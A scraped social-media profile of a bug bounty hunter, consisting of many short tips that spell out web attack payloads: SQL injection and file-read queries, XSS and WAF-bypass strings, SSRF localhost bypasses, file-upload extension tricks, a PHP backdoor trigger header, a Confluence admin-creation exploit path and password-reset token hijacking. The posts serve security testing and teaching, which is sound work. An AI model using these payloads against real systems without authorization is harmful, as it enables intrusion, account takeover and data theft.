Anton
@therceman
Followers
20,328
Following
596
Media
253
Statuses
3,584
👋 I’m Anton (therceman) 🪲 Bug Bounty Hunter 💬 Sharing Bug Bounty Hunting Knowledge ℹ️ ➡️ 🎞️ 💡
Latvia
Joined October 2019
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
#getoutofrafah
• 475494 Tweets
Macklemore
• 416463 Tweets
Stormy Daniels
• 175091 Tweets
Tango
• 66052 Tweets
iPad Pro
• 57926 Tweets
Switch 2
• 49941 Tweets
Hi-Fi Rush
• 42080 Tweets
#PSGBVB
• 39559 Tweets
Olon
• 37563 Tweets
iPad Air
• 31927 Tweets
Arkane Austin
• 27870 Tweets
Rebeca García
• 26848 Tweets
生田斗真
• 23151 Tweets
Redfall
• 21883 Tweets
#DCvsRR
• 19766 Tweets
Parc
• 19133 Tweets
Prey
• 18341 Tweets
Princes
• 18267 Tweets
無痛分娩
• 14942 Tweets
Apple Pencil Pro
• 14692 Tweets
Ghostwire
• 12327 Tweets
The Evil Within
• 12218 Tweets
Last Seen Profiles
Pinned Tweet
Sharing Bug Bounty Tips & Tricks
🔸
🔸
🔸
🔸
Bug Bounty Writeups & Tips
🔸
Discord Server
🔗
Website
🔗
3
22
118
Bug Bounty Tip
:: Log4j Vulnerability Cheatsheet
🔹 How It Works
🔹 Test Environments
🔹 Challenges & Labs (Rooms)
🔹 Where Payloads can be Injected
🔹 What Information can be Extracted
🔹 How To Identify (Services & Scanners)
14
456
1K
Bug Bounty Tip
List of localhost addresses for SSRF bypass
🔹
http://localhost
🔹
http://127.1
🔹
http://127.0.0.0
🔹
http://127.0.0.1
🔹
http://2130706433
🔹
http://0177.1
🔹
http://0x7f.1
🔹
http://127.000.000.1
🔹
http://localtest
.me
🔹
http://[::1]
🔹
http://[::]
Cheers!
15
235
1K
Bug Bounty Hint
How to test for SQL injection
1) Select params for testing in:
🔹 URL query
🔹 POST body
🔹 Headers
🔹 Cookies
It can be any parameter. Typically, I test integer parameters first.
🧵 1/8
59
362
978
Bug Bounty Info
GitHub Recon using GitHub Dorks
📖 Article
#CyberSecurity
#cybersecuritytips
#Hacking
#BugBounty
#bugbountytip
#infosec
#hacker
#togetherwehitharder
#bugcrowd
#hack
#hackers
#hackerone
12
487
967
Top 28 CyberSecurity Games
Sharpen Your Bug Bounty Skills
Credits to Morgan Hamlin
16
335
961
Bug Bounty Tip
SSTI (Server Side Template Injection) Payload List
🔹{7*7}
🔹*{7*7}
🔹{{7*7}}
🔹[[7*7]]
🔹${7*7}
🔹@(7*7)
🔹<?=7*7?>
🔹<%= 7*7 %>
🔹${= 7*7}
🔹{{= 7*7}}
🔹${{7*7}}
🔹#{7*7}
🔹[=7*7]
If evaluated as 49 - the target is vulnerable
Cheers!
10
221
924
Bug Bounty Hint
If you have found that server is running PHP - you can try to test it for RCE vulnerability.
Append following header to request:
User-Agentt: zerodiumsystem("id")
If PHP version is vulnerable - you will execute system("id") command on a server.
26
305
910
Bug Bounty Tip
The best place to check for SQL injection is Order By clause in query / body params.
Example:
orderby=asc,(SQL PAYLOAD)
14
181
678
Bug Bounty Tip
When testing an app for SQL injection, don't forget to check the form keys in addition to the values
Sometimes, developers may overlook applying protection to form keys
To bypass spaces, you can use the encoded tab %09.
For other symbols, simply URL encode them
9
118
553
Bug Bounty Tip
You can try to send multiple emails (one to the victim and a second to the attacker) on the password reset page using param manipulation or a CRLF injection on the email field.
This way, you may obtain the password reset token for a victim's account.
Cheers!
3
152
548
Bug Bounty Tip
When you find /sitemap.xml, check if it can handle the `offset=2` param.
If the content changes, this may be a dynamically generated sitemap, which could potentially be vulnerable to SQL injection.
// 3 sec sleep
?offset=2;SELECT IF((2>1),SLEEP(3),4)#
Cheers!
7
97
531
Bug Bounty Tip
Log4j Vulnerability Cheat Sheet
🔹 How It Works
🔹 Test Environments
🔹 Challenges & Labs (Rooms)
🔹 Where Payloads can be Injected
🔹 What Information can be Extracted
🔹 How To Identify (Services & Scanners)
Cheers!
5
124
511
Bug Bounty Tip
File Upload Filter Bypass
🔹 file.html.
🔹 file.htm%6C
🔹 file.html;
🔹 file.html%00
🔹 file.html%20
🔹 file.html%23
🔹 file.html/
🔹 file.html%0d%0a
🔹 file.html%2500
🔹 file.html%252e
🔹 file..html
🔹 file.tar.gz
#file
.html
Cheers!
0
119
512
Bug Bounty Tip
Don't forget to check for the /_wpeprivate/config.json endpoint on a website (usually with WordPress) for information disclosure.
Google Dork
👉 Site: *.example.com inurl:"_wpeprivate"
Cheers!
3
150
512
Bug Bounty Tip
Bypass XSS WAF protection using Whitespace Separators between a JS function name and parameters
<img/src/onerror=alert&
#xFEFF
;(1337)>
Refer to the attached image for the full list of Whitespace Separators.
P.S. can be used before function name too.
Cheers!
3
123
487
Bug Bounty Tip
You can use this payload
for finding XSS & SQLi
qwe'"<x</
🔸 qwe - easy to type & find in HTML
🔸 '" - JS/HTML breakout & SQLi
🔸 <x - HTML injection test
🔸 </ - <script> breakout
extra for SSTI/CSTI
{{[7*7]}}${7*7}qwe'"<x</
Cheers!
3
94
485
Bug Bounty Tip
Try to hide your XSS payload inside the "style" tag of the SVG or Math element to bypass the XSS sanitizer or WAF filter.
<svg><style>
<script>alert(1)</script>
</style></svg>
<math><style>
<img src onerror=alert(2)>
</style></math>
Cheers!
4
81
459
Bug Bounty Tips
jQuery XSS Payloads - Part 1
🔹 CVE-2020-11023
🔹 CVE-2020-11022
🔹 CVE-2019-11358
2
121
441
Bug Bounty Hint
Found PHPinfo page?
You can use XSS to extract user cookies from it and achieve an account takeover.
x=new XMLHttpRequest();
('GET','//host/phpinfo',0);
x.send();regex=/COOKIE'.*v">(.*?)</m;
alert(x.responseText.match(regex)[1]);
Cheers
16
90
439
Bug Bounty Tip
You can use these tricks to bypass the `alert` block by XSS WAF
- (function(x){this[x+`ert`](1)})`al`
- window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
- document['default'+'View'][`\u0061lert`](3)
Cheers!
2
85
435
How to start Bug Bounty?
What to learn
🔸 basics of HTML & JS
🔸 how Requests are handled by servers (methods, headers, params) & Responses by browsers
What to read
🔸 Disclosed Reports on HackerOne/BugCrowd/GitHub
🔸 WriteUps on Medium
Practice on
🔸 PortSwigger, HTB, THM
17
112
430
Bug Bounty Tip
Always check different encodings for your XSS payload.
For example:
?q=<img src onerror=alert(1)>
?q=\u003cimg src onerror=alert(1)\u003e
There might be a filter that removes <>,
but not unicode symbols \u003c \u003e.
Cheers!
4
98
429
Bug Bounty Tip
You can check if a website is running exactly a MySQL database and is potentially vulnerable to SQL injections by using !!0 as input for numeric parameters in the query string or request body.
P.S. Why MySQL thinks that !!0 == 1?
Cheers!
7
104
409
Bug Bounty Tip
How to detect potential SQL injection on numeric parameters in the URL query or JSON body.
Query: ?id=31337
or JSON Body: {"id": 31337}
Result: item with ID 31337
Query: ?id=31338-1
or JSON Body: {"id": "31338-1"}
Result: the same item with ID 31337
Cheers!
2
72
402
My First Bug Bounty Tip
from Aug 23, 2021
CSP Protection Bypass (using Google domain)
/o/oauth2/revoke?callback=alert(1);console.log
P.S. It's still working 😀
4
96
402
Bug Bounty Tip
PHP Info Page Exposure.
There's a lot of sensitive information that can be obtained from an exposed PHP Info page, from configuration secrets to exposed user session cookies.
For example, when chained with XSS, this can lead to a full account takeover.
Cheers!
3
91
390
Bug Bounty Reminder
Don't forget about the <math> element for XSS WAF bypass on Firefox browser.
<math>
<xss href="javascript:alert(31337)">
Click Me
</xss>
</math>
The <math> can make any HTML element clickable within it.
Cheers!
2
87
383
Bug Bounty Tip
If you found a Directory Listing vulnerability on a PHP Server - try to list the content of /var/lib/php/sessions
There is a chance that this folder will hold information about all user sessions, which can be used for mass accounts hijacking
8
93
386
Bug Bounty Tips
by
@LiveOverflow
1) Check request JSON for empty data/array.
Auth Bypass Example
❌ {"login":"user", "pass":"asd"}
✅ {} or {"_":"_"}
2) check for SQL Injection in JSON keys
SQL injection Example
✅ {"login\" or 1=1 -- -":"user"}
7
101
372
You can prevent your command from appearing in your command history by including a space before entering it.
The shell ignores commands prefixed with a space and, therefore, fails to register them in the history.
Tested on Ubuntu 22.04.3 / 23.04
Credits to: Qusai Alhaddad
10
79
376
Bug Bounty Tip
There's a chance to execute a CSRF attack by changing a POST request with body params to a GET request with query string params.
Additionally, you can try adding "_method=POST" (or PUT/PATCH) to the query string.
/users/delete?user_id=5&_method=POST
Cheers!
5
75
380
Bug Bounty Hint
Bypassing Cloudfront XSS WAF
1) alert = window["al"+"ert"]
2) bypass () with ``
3) replace space with /
4) encode symbols:
🔹< = %3c
🔹> = %3e
🔹" = %22
🔹[ = %5b
🔹] = %5d
🔹` = %60
Not Encoded Payload:
<svg/onload=window["al"+"ert"]`1337`>
Cheers
4
112
376
Bug Bounty CheatSheet
jQuery UI XSS Payloads
🔹 CVE-2022-31160
🔹 CVE-2021-41184
🔹 CVE-2021-41183
🔹 CVE-2021-41182
🔹 CVE-2016-7103
🔹 CVE-2012-6662
🔹 CVE-2010-5312
🔗
1
119
374
Bug Bounty Tip
Sensitive Data Exposure in ASP•NET app
Endpoint: /Trace.axd
Google Dorks:
🔹inurl:"trace.axd"ext:axd
🔹intext:"Requests to this"ext:axd
🔹inurl:"trace.axd"ext:axd "Application"
2
93
373
Bug Bounty Tips
jQuery-UI XSS Payloads - Part 2
🔹 CVE-2021-41184
🔹 CVE-2016-7103
🔹 CVE-2012-6662
🔹 CVE-2010-5312
7
109
369
Bug Bounty Tip
Google Dork for Open Redirect or XSS URLs
Site:*.example.com inurl:return_to
Cheers!
4
78
369
Bug Bounty Hint
You can try following Google Dork to find Open Redirect or XSS endpoints
Site:*.example.com inurl:return
Other redirect params:
🔸 return_to
🔸 return_uri
🔸 redirect
🔸 redirect_to
🔸 redirect_uri
🔸 page
🔸 site
🔸 next
🔸 view
🔸 back
🔸 url
🔸 to
9
97
355
Bug Bounty Hint
Don't forget about the magical '<math>' element, which can make any HTML element clickable within it when using the Firefox browser.
<math>
<xss href="javascript:alert(1337)">
Click Me
</xss>
</math>
This method can be used to bypass
Cheers!
3
75
359
Bug Bounty Hint
GBK Encoding / MultiByte Attack
嘊 = %E5%98%8A = \u560a ⇒ %0A
嘍 = %E5%98%8D = \u560d ⇒ %0D
嘾 = %E5%98%BE = \u563e ⇒ %3E (>)
嘼 = %E5%98%BC = \u563c ⇒ %3C (<)
嘢 = %E5%98%A2 = \u5622 ⇒ %22 (')
嘧 = %E5%98%A7 = \u5627 ⇒ %27 (")
For XSS, CRLF, WAF bypass
8
99
349
Bug Bounty Tip
You can use an automatically generated real-world wordlist in your Recon (updated regularly)
Includes paths for:
🔸 Wordpress
🔸 Joomla
🔸 Drupal
🔸 Magento
🔸 Ghost
🔸 Tomcat
🔸 Laravel
🔸 Prestashop
🔸 Woocommerce
🔸 and more
Cheers!
2
121
355
Bug Bounty Tip
Bypass XSS WAF protection using a comment between a JS function name and parameters
<img/src/onerror=alert/*1337*/(1)>
<img/src/onerror=alert//
(2)>
<img/src/onerror=alert/**/(3)>
Cheers!
2
83
347
Bug Bounty Hint
File Upload
Extension Splitting Cheat Sheet
🔸 qwe.php%00.png
🔸 qwe.php%0A.png
🔸 qwe.php\n.png
🔸 qwe.php\u000a.png
🔸 qwe.php\u560a.png
🔸 qwe.php%E5%98%8A.png
🔸 qwe.php;.png
🔸 qwe.php%3B.png
🔸 qwe.php\u003b.png
🔸 qwe.php\u563b.png
🔸 qwe.php%E5%98%BB.png
6
105
344
Bug Bounty Tip
You can use <input type=image>
when <img> tag attributes
are removed.
Cheers!
1
72
338
Bug Bounty Tip
GBK Encoding / MultiByte Attack
嘊 = %E5%98%8A = \u560a ⇒ %0A
嘍 = %E5%98%8D = \u560d ⇒ %0D
嘾 = %E5%98%BE = \u563e ⇒ %3E (>)
嘼 = %E5%98%BC = \u563c ⇒ %3C (<)
嘢 = %E5%98%A2 = \u5622 ⇒ %22 (')
嘧 = %E5%98%A7 = \u5627 ⇒ %27 (")
For XSS, CRLF, WAF bypass
7
91
339
Bug Bounty Hint
Try to hide your XSS payload inside the style tag of the SVG or Math element to bypass the XSS Sanitizer or WAF filter.
<svg><style>
<script>alert(1)</script>
</style></svg>
<math><style>
<img src onerror=alert(2)>
</style></math>
Happy Hunting!
10
86
335
Bug Bounty Resource Collection
📖 Resources & Disclosed reports
💰 For beginners and experienced players
🔹 Books
🔹 Blogs
🔹 Training Platforms
🔹 Recon
🔹 XSS
🔹 CSRF
🔹 IDOR
🔹 SSRF
🔹 XXE
🔹 SQLi
🔹 Race Condition
🔹 Subdomain Takeover
7
172
330
Bug Bounty Tip
Rare case XSS scenario.
App URL encoded all symbols from the query string.
?go=qwe'"<x
❌ <a href="/qwe%27%22%3Cx">
added # hashtag (%23) broke encoding
?go=qwe%23"><svg/onload=alert(1)>
✅ <a href="/qwe#"><svg/onload=alert(1)>
Cheers!
3
70
320
Bug Bounty Hint
SSTI (Server Side Template Injection) Payload List
🔹{{7*7}}
🔹${7*7}
🔹<%= 7*7 %>
🔹${{7*7}}
🔹#{7*7}
If evaluated as 49 - target can be vulnerable
to XSS or even RCE
#BugBounty
#bugbountytip
#infosec
#CyberSecurity
#cybersecuritytips
#Hacking
#hacker
#hack
4
122
313
Bug Bounty CheatSheet
jQuery XSS Payloads
🔹 CVE-2020-11023
🔹 CVE-2020-11022
🔹 CVE-2019-11358
🔗
3
72
311
Bug Bounty Tip
A full-width version of symbols
For XSS, CRLF, WAF bypass
2
73
303
Bug Bounty Hint
Try to append # (%23) to URL with XSS payload when URL is encoded - it may break encoding in some rare cases and you can perform XSS Attack.
Example (encoded):
<a href=javascript%3Aalert(1)//>
Bypass (# at end):
<a href=javascript:alert(1)//#>
#bugbountytips
10
94
294
Bug Bounty Tip
If you have discovered XSS on the endpoint with JSON Content-Type, open Firefox and append ;.html to it. This might trick the browser to serve the page as HTML (instead of JSON) and trigger the XSS payload.
Example: /api/users -> api/users;.html
#bugbountytips
5
80
301
Bug Bounty Tip
When testing the API field with UUID type,
try to change the UUID value type
to ID or even an Email
/api/user/a8ae-1322-ac09-8f90
/api/user/1
/api/user/user
@company
.com
Cheers!
2
62
298
Bug Bounty Tip
Places where you can inject
JavaScript protocol for XSS
e.g. javascript:alert(1337)
🔹 <a href=[xss]>
🔹 <iframe src=[xss]>
🔹 <form action=[xss]>
🔹 <form><button formaction=[xss]>
Firefox Only
🔸 <embed src=[xss]>
🔸 <object data=[xss]>
Cheers!
4
64
296
Bug Bounty Hint
If you found an SSRF on AWS Lambda - try to request "localhost:9001/2018-06-01/runtime/invocation/next"
You can find some juicy secrets there, like AWS keys and other sensitive information.
13
61
296
Bug Bounty Tips
Sensitive Data Exposure
in ASP•NET apps via /Trace.axd endpoint
6
86
285
Bug Bounty Tip
You can find an origin server IP address of website behind CloudFlare by using this GitHub repo that uses Internet-wide scan data from Censys.
Happy Hunting! 💰
2
89
289
Bug Bounty Hint
Try multiple emails on password reset and check your both email accounts for a mail.
🔹 email=victim&email=attacker
🔹 email[]=victim&email[]=attacker
🔹 email=victim,attacker
🔹 {email: victim, email:attacker}
🔹 {email: [victim,attacker]}
#bugbountytips
10
74
291
Bug Bounty Writeup
XSS vulnerability via using emojis
Credits to Patrik Fabian
5
85
284
Bug Bounty Hint
What is SQL injection, how to detect and exploit it 🎯
Highly detailed article, worth reading
#bugbountytips
4
116
283
Bug Bounty Hint
Try the Full-Width version of the commonly used symbols for XSS/WAF/SQL filter bypass.
🔹< - %EF%BC%9C (\uff1c)
🔹> - %EF%BC%9E (\uff1e)
🔹\ - %EF%BC%BC (\uff3c)
🔹/ - %EF%BC%8F (\uff0f)
🔹' - %EF%BC%87 (\uff07)
🔹" - %EF%BC%82 (\uff02)
Happy Hunting!
3
77
279
Bug Bounty Tip
Quote-less base64 encoded XSS payload
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
Cheers!
5
59
280
Bug Bounty Hint
You can read local files using SQL injection
🔸 PostgreSQL
SELECT pg_read_file('/etc/passwd')
🔸MySQL
SELECT * LOAD_FILE('/etc/passwd')
#bugbountytips
4
72
279
Bug Bounty Tip
JWT Token Checklist
🔸 None-signing algo is allowed
🔸 Secret is leaked somewhere
🔸 Server never checks secret
🔸 Secret is guessable/bruteforce
🔸 Never expiring token
🔸 Token generated on client-side
🔸 Change algo RS256 to HS256
🔸 JWKS Spoofing
10
84
276
Bug Bounty Tip
You can use \ on string params to detect if a website is using MySQL/MariaDB database and devs prefer RAW queries over PDO.
?name=John (OK)
?name=Jo\hn (OK)
?name=Jo\\hn (Not Found)
If you observe this behavior, there’s a chance to find an SQL injection
Cheers!
2
52
272
Bug Bounty Tip
HTML entities can help you bypass WAF filters
1) bypass block of single quote '
?url=home%26apos;-alert(1)//
onclick="location='/home'-alert(1)//'"
2) bypass block of colon :
?url=javascript%26colon;alert(1)
href="javascript:alert(1)"
Cheers!
1
64
267
Bug Bounty Tip
When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com
Then, use these symbols
to craft an XSS payload
🔹%0a
🔹%0d
🔹%E2%80%A8
🔹%E2%80%A9
✅ javascript://test.com%0aalert(1)
Cheers!
0
54
262
Bug Bounty Hint
When you see Forbidden page with authorisation pop up (that prompts you for a login and password) - you can try to perform SQL Injection attack.
Great Writeup with example 👇
2
91
255
Bug Bounty Tip
Shortest XSS PoC Payload
- No dots
- No quotes
- No space
- Max 31 characters
<script/src=//6a%2elv></script>
Shoutout to
@renniepak
and
@joaxcar
Cheers!
2
55
266
How to find out if a website is using a MySQL database via an integer SQL Injection test.
Users
ID:1, Clark
ID:2, Dave
ID:3, Ava
URL Query: ?id=2--1
- MariaDB/MySQL: ID:3, Ava
- PostgreSQL: Dave
- SQL Server: Dave
- MongoDB: ERROR
Thanks to
@irahulmali
for the tip
Cheers!
3
59
258
Bug Bounty Tip
:: XSS Injection - HTML Tags & Attributes
=> Part 1
Tags: <img>, <a>
#CyberSecurity
#cybersecuritytips
#Hacking
#BugBounty
#bugbountytip
#infosec
#hacker
#togetherwehitharder
#bugcrowd
#hack
#hackers
#hackerone
1
102
261
Bug Bounty Tip
:: HTML Injection - Information Disclosure
Hijack information from a page using <img> tag with unclosed "src" attr
#CyberSecurity
#cybersecuritytips
#Hacking
#BugBounty
#bugbountytip
#infosec
#hacker
#togetherwehitharder
#bugcrowd
#hack
#hackers
#hackerone
1
111
254
Bug Bounty Hint
How to detect potential SQL or NOSQL injection
{"id":"56456"}
Result: loaded item with ID 56456
{"id":"56457-1"}
Result: loaded the same item with ID 56456
Happy Hunting!
2
62
254
Bug Bounty Hint
Don't forget to check for the /_wpeprivate/config.json endpoint on a website for information disclosure.
P.S. WPEngine is a provider of managed WordPress hosting. It creates a folder named _wpeprivate that contains the config.json with highly sensitive info.
10
57
247
Bug Bounty Hint
You can use automatically generated real-world wordlist in your Recon (updated regularly)
Includes paths for:
🔸 Wordpress
🔸 Joomla
🔸 Drupal
🔸 Magento
🔸 Ghost
🔸 Tomcat
And 1.4 million words for subdomains
8
72
249
Bug Bounty Tip:
When testing file upload functionality, don't forget to check for path traversal. This can potentially exploit arbitrary file overwrite vulnerabilities.
Doing so could result in the overwriting of static files like JS/HTML or even other users' files.
Cheers!
3
56
244
Bug Bounty Reminder
Don’t forget about the <details> tag. It’s often not blocked by WAF.
<details ontoggle=alert(31337) open>
Cheers!
3
37
248
Bug Bounty Tip
Don't forget to search for traits of 'post message' event handlers in all JS sources by using the built-in search functionality in your browser.
Search:
window.addEventListener("message"
Inspect those events for potential XSS
9
66
242
Bug Bounty Tip
When testing for XSS, consider where you inject your payload.
1) Before the original value
2) After the original value
3) Replacing the original value
Sometimes the payload will work only if added to the end (or beginning) of the original value.
Cheers!
1
40
237
Bug Bounty Tip
Overlong UTF-8 encoding Attack
2-byte / 3-byte ⇒ original
%C0%8A / %E0%80%8A ⇒ %0A
%C0%8D / %E0%80%8D ⇒ %0D
%C0%BE / %E0%80%BE ⇒ %3E (>)
%C0%BC / %E0%80%BC ⇒ %3C (<)
%C0%A2 / %E0%80%A2 ⇒ %22 (")
%C0%A7 / %E0%80%A7 ⇒ %27 (')
For XSS, CRLF, WAF bypass
3
74
239
Extension Bypass V2
🔸 do.php%00.png
🔸 do.php%0A.png
🔸 do.php\n.png
🔸 do.php\u000a.png
🔸 do.php\u560a.png
🔸 do.php%E5%98%8A.png
🔸 do.php#.png
🔸 do.php%23.png
🔸 do.php\u0023.png
🔸 do.php;.png
🔸 do.php%3B.png
🔸 do.php\u003b.png
🔸 do.php\u563b.png
🔸 do.php%E5%98%BB.png
2
86
235
Bug Bounty Tip
When dealing with WAF/XSS sanitizers - don't forget to try the <select> mXSS trick.
<select><style></select>
<svg onload=alert(1)>
</style>
The browser will remove the <style> tag, while WAF/sanitizer will think that HTML inside the <style> tag is safe.
Cheers!
2
52
239
Bug Bounty Tip
XSS Injection in HTML Tags & Attributes
Tags: <img>, <a>
Cheers!
3
34
225
Bug Bounty Tip
You can use the backtick/backquote/grave ` symbol to bypass the WAF restriction of parentheses/braces () in the XSS payload.
<a href="javascript:alert`1337`">go</a>
HTML Entities
🔹`
🔹`
javascript:alert`1337`
Cheers!
0
37
223
Bug Bounty Tip
CVE-2023-22515
(new admin creation)
Atlassian Confluence 8
Versions: <8.3.3, <8.4.3, <8.5.2
1) enable setup
/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
2) create a new admin
/setup/setupadministrator-start.action
Cheers!
1
44
220
Bug Bounty Tip
You can test server for DDOS by uploading image with extremely big pixel size (64250x64250px)
Ref: hackerone/reports/390
#bugbountytips
8
54
219
Bug Bounty Tip
If you're having trouble bypassing CloudFlare's WAF, try finding the origin server's IP address using this GitHub repo that utilizes Internet-wide scan data from Censys.
Once you have the IP, make requests directly to the server.
Cheers!
2
72
222
Bug Bounty Tip
Check your uploaded files for XSS vulnerabilities.
Filenames can contain HTML tags on Unix-based systems.
In most cases, you should manually edit the filename when the file is uploaded (e.g., using Burp Suite).
report<img src onerror=alert(1)>.csv
Cheers!
3
33
216
Bug Bounty Tip
There are HTML tags that need to be
closed before applying an XSS payload.
Otherwise payload will be
encoded or removed from HTML.
Cheers!
3
39
216
Bug Bounty Tip
Line terminators.
For XSS / CRLF injection.
🔹LF: %0A (\u000A)
🔹VT: %0B (\u000B)
🔹FF: %0C (\u000C)
🔹CR: %0D (\u000D)
🔹CR+LF: %0D%0A (\u000D\u000A)
🔹NEL: %C2%85 (\u0085)
🔹LS: %E2%80%A8 (\u2028)
🔹PS: %E2%80%A9 (\u2029)
Cheers!
2
38
217
Bug Bounty Tip
Bypass a WAF by discovering the origin IP address of a server using the following tricks:
- search domain on Censys
- domain history on SecurityTrails
- test pingbacks (XML-RPC, SSRF)
- fake email to domain & check receipt
- receive domain email & check headers
2
42
216
Bug Bounty Tip
When the XSS entry point in the HTML attribute has blacklisted symbols - you try these payloads
Cheers!
1
50
211